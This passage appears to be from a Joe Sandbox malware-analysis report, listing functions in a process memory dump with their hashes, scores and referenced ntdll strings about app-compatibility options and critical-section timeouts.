                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03204655
                                                                                      • Execute=1, xrefs: 03204713
                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03204742
                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032046FC
                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03204787
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                      • API String ID: 0-484625025
                                                                                      • Opcode ID: cccb7fd17ecfda079c280430d6669cbf600fb3070ab475ec4faf429649afa50b
                                                                                      • Instruction ID: 83eb321082e8ebebe68c02783d21867b3b82d9f24cf98cb0964e902bdd991f5f
                                                                                      • Opcode Fuzzy Hash: cccb7fd17ecfda079c280430d6669cbf600fb3070ab475ec4faf429649afa50b
                                                                                      • Instruction Fuzzy Hash: FB51F935A103697FEF10EBA5DD89BADB3B8AF1C700F0401ADD515AB1D1DBB09A858F50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03266940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                      • Instruction ID: 2ad8851c752e1489e64a5f55d8981c85f147cce9a87ac5dfc10174780197d061
                                                                                      • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                      • Instruction Fuzzy Hash: 96022475518341AFC304CF18C890A6FBBE5EFC8704F048A6DF9899B264DB75E985CB82
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-$0$0
                                                                                      • API String ID: 1302938615-699404926
                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                      • Instruction ID: 3a27628a9c27f8aa5024b2afe5a9f2d37e0b993f0b4ad60b0ee791790d35a62c
                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                      • Instruction Fuzzy Hash: D3818074E092499BDF28CE68C8917FEBBA5AF4E350F1EC259D852A73D0C7349880CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 032420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: %%%u$[$]:%u
                                                                                      • API String ID: 48624451-2819853543
                                                                                      • Opcode ID: ace7e335bfdb2e06d03595ea7a39b79e4a35bdd6d564d9fe35f8a1257865b45a
                                                                                      • Instruction ID: ca465fb6545419635d2b3365ad702c0af353f56b58880f6cc878eeebfdce1e49
                                                                                      • Opcode Fuzzy Hash: ace7e335bfdb2e06d03595ea7a39b79e4a35bdd6d564d9fe35f8a1257865b45a
                                                                                      • Instruction Fuzzy Hash: DB21567AA102199BDB14DF6AD8409AFB7E8AF48A40F080515F915E7201E771DA41CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 0320031E
                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032002BD
                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032002E7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                      • API String ID: 0-2474120054
                                                                                      • Opcode ID: e5143cf9f5b975143a1fbca3a86df97011a1022bf6c84c27c24582b6aa8fa074
                                                                                      • Instruction ID: db5d3de785891b7a58589f55bae0835e317533927b414473f04e6302102b05c5
                                                                                      • Opcode Fuzzy Hash: e5143cf9f5b975143a1fbca3a86df97011a1022bf6c84c27c24582b6aa8fa074
                                                                                      • Instruction Fuzzy Hash: 10E1DF346147429FD725CF28C884B6AB7F0BF89714F184A6DF4A58B2D1D774D88ACB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 03207BAC
                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03207B7F
                                                                                      • RTL: Resource at %p, xrefs: 03207B8E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 0-871070163
                                                                                      • Opcode ID: 07188668027a9f496f792844e975af972679fea89aa0995a10af4bdadf8b9282
                                                                                      • Instruction ID: 0c5ab904db874ff1c01ecd3073b8716044183eb206d57b9932ad3f638a132033
                                                                                      • Opcode Fuzzy Hash: 07188668027a9f496f792844e975af972679fea89aa0995a10af4bdadf8b9282
                                                                                      • Instruction Fuzzy Hash: 554122353187429FC724CE29C841B6AB7E5EF9C710F044A2DF85ADB780DB70E8458B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0320728C
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 032072C1
                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03207294
                                                                                      • RTL: Resource at %p, xrefs: 032072A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 885266447-605551621
                                                                                      • Opcode ID: fd65fba54d48f005470d6dcb863381b474546dbaa489d9b6df92482397e65acd
                                                                                      • Instruction ID: d700e233a5673ff8b3534971219a31f53fe0588949b0e4c79011c3122f2f62c1
                                                                                      • Opcode Fuzzy Hash: fd65fba54d48f005470d6dcb863381b474546dbaa489d9b6df92482397e65acd
                                                                                      • Instruction Fuzzy Hash: 10411035618246AFC720CE28CC42B6AB7A5FF58710F144619F855EB281DB31F896CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03242300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: %%%u$]:%u
                                                                                      • API String ID: 48624451-3050659472
                                                                                      • Opcode ID: 72628cde6d088d830969532e77bbdd285542c6f7d0442b9025a7c5f79ab5e252
                                                                                      • Instruction ID: e8197c330c19bc426e2d8ae47831e2216beefb3f9f0198b7ef6e77421b0c8c57
                                                                                      • Opcode Fuzzy Hash: 72628cde6d088d830969532e77bbdd285542c6f7d0442b9025a7c5f79ab5e252
                                                                                      • Instruction Fuzzy Hash: 63314376A10719DFCB24DF29DC40BAEB7B8EB44610F444955E859E7240EB309A848BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-
                                                                                      • API String ID: 1302938615-2137968064
                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction ID: e571c8a113a3ae55438582b04446b1124a4953f2e62edd2610200d7511d9cd38
                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction Fuzzy Hash: 0391D271E002169BDF34DE69C881ABEF7A5FF4E320F58461AE875EB2C4D73099818750
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03199126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$@
                                                                                      • API String ID: 0-1194432280
                                                                                      • Opcode ID: b43dcfd720f30f74cb3d1ac2c12a4b751b7d85d4a3d9fe280fa58de3b9d3c722
                                                                                      • Instruction ID: a2e550c54b1a7294cf3345efde63eafd8924de19dec2adf4f14242849a5d3596
                                                                                      • Opcode Fuzzy Hash: b43dcfd720f30f74cb3d1ac2c12a4b751b7d85d4a3d9fe280fa58de3b9d3c722
                                                                                      • Instruction Fuzzy Hash: 2D812875D002699BDB35DB54CC44BEEB7B8AF08710F0445EAEA19B7280E7309E85CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%